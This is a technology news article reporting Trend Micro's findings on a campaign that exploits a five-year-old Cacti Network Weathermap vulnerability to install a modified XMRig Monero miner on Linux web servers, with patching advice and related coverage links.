Cryptocurrency mining malware uses five-year old vulnerability to mine Monero on Linux servers

Hackers are targeting accessible x86-64 Linux web servers around the world.
Written by Danny Palmer, Senior Writer

Video: Using GitHub cloak, malware masterminds finetune cryptojacking code

Hackers are using a five-year-old security vulnerability to infect Linux servers with cryptocurrency-mining malware.

The cryptojacking campaign exploits CVE-2013-2618, an old vulnerability in Cacti's Network Weathermap plug-in, an open source tool which is used by network administrators to visualise network activity.

Attackers can use the vulnerability to inject HTML and JavaScript into the title of maps in the network editor, as well as uploading malicious PHP code to a webserver.

The vulnerability was disclosed in April 2013 and the patch has been available for almost five years, but attackers are still using it to help mine cryptocurrency in 2018.

Uncovered by researchers at Trend Micro, the campaign is still active and is targeting publicly accessible x86-64 Linux web servers around the world, with the highest proportion of targets in Japan, Taiwan, China, and the US.

The attackers use the exploit to request to view the code on the server, with the flaw enabling them to alter the code to install a coin miner on the system.

The process runs every three minutes, in order to ensure that if it is somehow shutdown, the server will soon restart the mining process.

The miner itself is a modified XMRig tool, a legitimate, open-source Monero miner, which has been instructed to secretly perform its actions for the benefit of the attackers. Those behind it can even alter the maximum CPU usage of the miner, should they wish to lower the percentage of power used in order to reduce the chances of their activity being noticed.

See also: Is it time to simplify software?

Researchers uncovered some of the wallets, and say by using these miners, one attacker has acquired 320 Monero -- which works out at just under $75,000. However, they note that is only a small proportion of what has been acquired by this campaign, which could have mined $3m worth of the cryptocurrency.

While attackers are always trying to find means of carrying out attacks, keeping systems patched is a good way to secure systems -- while servers might be more difficult to patch than a PC, there's little reason to have not applied a five-year-old update.

Researchers also recommend that for those running Cacti's Network Weathermap plug-in, the data should be kept secure and away from public servers.

"Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments, it also does the same for threat actors," Trend Micro researchers, said in a blog post.

Now read: What is malware? Everything you need to know about viruses, trojans and malicious software

Cryptocurrency mining has become a popular way for cyber-crooks to earn money, with attacks successful over a long period of time because the malware remains hidden.

While cooling fan activity might increase, due to a greater demand for computer power, might be noticeable in some instances, the average user isn't going to think about it as much as a concern, let alone make the link to being infected with malware.

Indeed, cryptocurrency mining has now become so popular with cybercriminals, it has become as lucrative as ransomware for hackers.

Recent and related coverage

Bureau of Meteorology staff questioned by AFP over cryptocurrency mining: Report

The ABC first reported that staff are being investigated by the Australian Federal Police for allegedly mining cryptocurrency on the bureau's computers.

Ad network circumvents blockers to hijack browsers for cryptocurrency mining

An advertising network has come up with a way to ignore ad blockers in order to serve cryptocurrency mining scripts to visitors.

Telegram zero-day let hackers spread backdoor and cryptocurrency-mining malware

Attacks first took place in March 2017 and are being carried out by Russian cybercrime gangs, says Kaspersky Lab.


Editorial standards